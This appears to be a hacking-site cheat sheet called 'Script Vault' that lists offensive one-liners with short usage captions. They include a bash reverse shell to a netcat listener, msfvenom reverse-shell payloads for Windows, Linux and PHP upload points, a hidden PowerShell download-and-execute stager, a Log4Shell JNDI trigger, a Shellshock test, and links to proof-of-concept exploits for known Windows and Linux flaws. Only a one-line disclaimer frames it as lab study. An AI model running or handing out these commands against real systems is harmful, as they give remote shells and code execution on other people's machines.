Scripts | IceHacker

Script Vault

Curated one-liners, payload makers, and publicly released proof-of-concepts. For study on lab systems only. Always obey local laws.

bash -i >& /dev/tcp/<IP>/4444 0>&1

Point to your netcat listener. Quick post-ex foothold on Unix targets.

python3 -m http.server 80

Spin up a simple web server in your working directory.

find / -perm -4000 -type f 2>/dev/null

Pinpoint privilege-escalation candidates on Linux hosts.

nmap -sS -Pn -T4 <target>

Quick port sweep while avoiding full TCP handshakes.

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f exe -o shell.exe

Classic Metasploit payload for lab VMs.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f elf -o shell.elf

Drop to /tmp, chmod +x, execute.

msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=4444 -f raw \| base64 -w0

Paste into vulnerable PHP upload points.

powershell -nop -w hidden -c "$b=new-object net.webclient;$b.downloadstring('http://<IP>/stager.ps1')|iex"

One-line loader for red-blue lab sims.

curl 'ldap://<IP>/a' -H 'X-Api-Version: ${jndi:ldap://<IP>/a}'

Minimal trigger for vulnerable Java apps. GitHub advisory

nmap -p 443 --script ssl-heartbleed <target>

Checks OpenSSL for the famous information disclosure bug.

PoC repo →

curl -H "User-Agent: () { :;}; echo vulnerable" http://<target>

Quick CGI injection test against vulnerable Bash versions.

Python PoC Targets vulnerable RDP services on Windows 7 and Server 2008 R2.

PowerShell PoC Exploits Windows Print Spooler for local or remote code exec.

C PoC Race condition in Linux copy-on-write breaks kernel write protection.

Python scanner & exploit SMBv1 buffer overflow leveraged by WannaCry.